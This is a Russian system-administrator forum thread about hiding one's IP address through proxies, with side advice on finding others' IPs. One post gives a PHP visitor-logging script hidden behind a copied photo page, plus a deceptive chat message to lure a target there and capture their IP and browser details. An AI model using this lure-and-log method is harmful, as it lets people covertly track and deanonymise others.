Форум системного администратора

Объявление

Форум системного администратора рад приветствовать Вас. Наша основная цель заключается в качественном обмене опытом в сфере высоких технологий. Спешите зарегистрироваться и вступить в наше сообщество IT-специалистов. Администрация сайта была бы очень признательна, если бы вы заходили на рекламу: вам это ничего не стоит, а нам хоть какие-то начисления:)
Администрация.

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.


Вы здесь » Форум системного администратора » В Интернете » Как скрыть свой IP


Как скрыть свой IP

Сообщений 1 страница 14 из 14

1

Для скрытия IP, нужно пользоваться proxy-сервером, желательно свой страны. Более защищенный доступ дают элитные прокси.

Все вопросы по сабжу задаем сюда. Можно выложить списки бесплатных и платных proxy-хостов, народ, думаю, будет благодарен :)

0

2

Млин, а вот такой вопрос, ты ДП увлекаешься? Так, какой смысл скрывать IP? Как, в die hard 4.0 вскрыть ПВО с ноутбука? Бесполезная вещь ламеров.

0

3

Не совсем понял, что ты имеешь в виду. Может тебе и мне это не совсем нужно, а вот если посмотреть книгу самых популяных запросов на поисковиках, то "Как скрыть свой IP", занимает далеко не последнее место. :)

0

4

Просто мой маленький мозг не воспринимает, зачем его скрывать? Чем, ты таким увлекаешься, что хочешь скрыть IP? Так или иначе люди в погонах тебя найдут и поимеют.

То, что это один из самых популярных вопросов в поисковике - и что? Обязательно нужно скрыть его?

0

5

Не я хочу скрыть, а юзеры. Потому и создал тему.

0

6

Делается довольно просто, смысл такой:

ты --- прокси --- прокси --- прокси ...до опупения прокси... --- сервер, что нужен

Ни одна из настроек IE не делает много проксей, через прокси. Для этого скачивается freecap в опенсурсе, кстати, и юзается. Список прокси серверов, я думаю, не проблема найти.

FreeCap: кликнуть тут

___
Минус - скорость. Пока там, пока там.

0

7

Думаю, пользователи скажут тебе спасибо. :)

0

8

А если нет через спутник, IPообще можно скрыть???

0

9

Лично я знаю как узнать IP адрес web сайта?

Пуск->Выполнить->command->ping адрес_сайта. А как скрыть, честно сказать даже не пытался.

0

10

а у меня вообще при каждом подключении новый IP

0

11

Это не только у тебя)))

0

12

Kadaffi написал(а):

Это не только у тебя)))

Че, я не один такой умный

0

13

Как узнать ip сервера, например yandex.ru?

Самый быстрый способ – набрать в командной строке «ping yandex.ru»

Ты увидишь что-нибудь вроде

64 bytes from 213.180.204.11: icmp_seq=0 ttl=41 time=60.988 ms

213.180.204.11 – это и есть ip-адрес сервера.

Как узнать ip юзера в сети?

1. Общаться с ним по аське. Многие icq-клиенты, такие как Miranda IM, SIM и т.п., показывают ip в информации о пользователе. Если не хотите качать продвинутые клиенты, можно воспользоваться специальными программами типа uin2ip, или патчами для стандартных версий ICQ.

Кроме того, на сайте wwwleader.ru есть UIN Locator. Вводишь UIN получаешь IP, главное чтобы чел был не в оффлайне.

2. Добиться того, чтобы пользователь прислал тебе письмо. Вне зависимости от того, пользуется ли он веб-интерфейсом, или же почтовиком вроде TheBat!, в заголовках сообщения будет указан его ip. В TheBat! Заголовки можно прочитать, нажав правую кнопку и выбрать в контекстном меню «показывать заголовки RFC-822». Ищи текст «Received: from», который находится ближе всего к телу письма – сразу за этими словами будет ip-адрес отправителя.

3. Узнать на каких irc-каналах сидит юзер и посмотреть там.

4. Если ничего не помогает, но очень хочется, не отчаивайся.

Если у тебя есть хостинг, на котором можно исполнять perl/php (если нет, можно бесплатно зарегистрировать, например, на h15.ru), то вот еще один способ – выбираешь страничку, на которой есть фотография какого-нибудь случайного человека (допустим, http://masters.donntu.edu.ua/2001/ggeo/pavelchak/), полностью копируешь HTML-код в новый файл, например, info.html и сохраняешь его на своем сайте. Рядом создаешь еще один файл index.php, следующего содержания:

<?  $message = "Date: " .
  date("d.m.Y H:i:s") .
  "\nIP: " . $REMOTE_ADDR .
  "\nServer: " .
  gethostbyaddr($REMOTE_ADDR) .
  "\nHTTP_X_FORWARDED_FOR: " .
  $HTTP_X_FORWARDED_FOR .
  "\nPage: " .
  $SERVER_NAME .
  $REQUEST_URI .
  "\nQuery: " .
  $QUERY_STRING .
  "\nComing from: " .
  $HTTP_REFERER .
  "\nBrowser: " .
  $HTTP_USER_AGENT .
  "\nFilename: " .
  $SCRIPT_FILENAME;  mail("admin@mail.ru",
  "Requested ip", $message,
  "From: admin@mail.ru\nContent-Type: text/plain; charset=windows-1251",
  "-fadmin@mail.ru");  $ = fopen("log.txt", "a");  fwrite($fp, str_replace("\n", "\t", $message) . "\n");  fclose($fp);   include("fil.html");?>Само собой, мыло admin@mail.ru необходимо заменить на твой почтовый ящик. Эта страничка (index.php) визуально не будет отличаться от оригинала, но логи с ip и параметрами системы юзера отошлются тебе на почту и продублируются в лог-файл (проверь, что у этого файла есть права на запись, например 666, или 777). Кроме того, если человек находится в локальной сети, ты получишь еще и его локальный ip, а если ходит через прокси, то поимеешь ip как прокси, так и его собственный.

Теперь твоя задача – заманить юзера на эту страничку. Само собой, не стоит просто присылать ее по аське. Мой любимый способ такой: «Привет [тут имя того, чей ip хочешь узнать], ты помнишь Таню ([а вот тут как раз линк на твою страничку с фоткой])? Она сказала, ты можешь помочь мне с дизайном (взломом, разведением кактусов и т.п).

Действует 100% :)

0

14

Как скрыть свой ip?

Если ты хочешь скрыть, т.е. поменять свой IP, то самый простой способ это сделать – воспользоваться анонимными прокси. Однако, не все так просто.

Обычно при обращении к сайту веб-серверу передаются два IP-адреса: REMOTE_ADDRESS и HTTP_X_FORWARDED_FOR.

REMOTE_ADDRESS – это, и есть твой ip-шник: по которому банят, который видят админы и т.п.

HTTP_X_FORWARDED_FOR - это дополнительный параметр, в котором хранится твой реальный IP. Например, если ты в локальной сетке, тут будет твой внутренний адрес.

Имей ввиду, что даже если если ты ходишь в сеть через прокси, и твой IP сменился на IP проксика, в HTTP_X_FORWARDED_FOR по-прежнему будет светиться твой старый IP!

Поэтому для полной анонимности нужно выбирать только те прокси, которые помечены как high anonymous или elite proxy. Эти сервера не передают никакой информации о твоем старом IP и полностью конфиденциальны. Если, конечно, это не сервера агентов спецслужб ;)

0


Вы здесь » Форум системного администратора » В Интернете » Как скрыть свой IP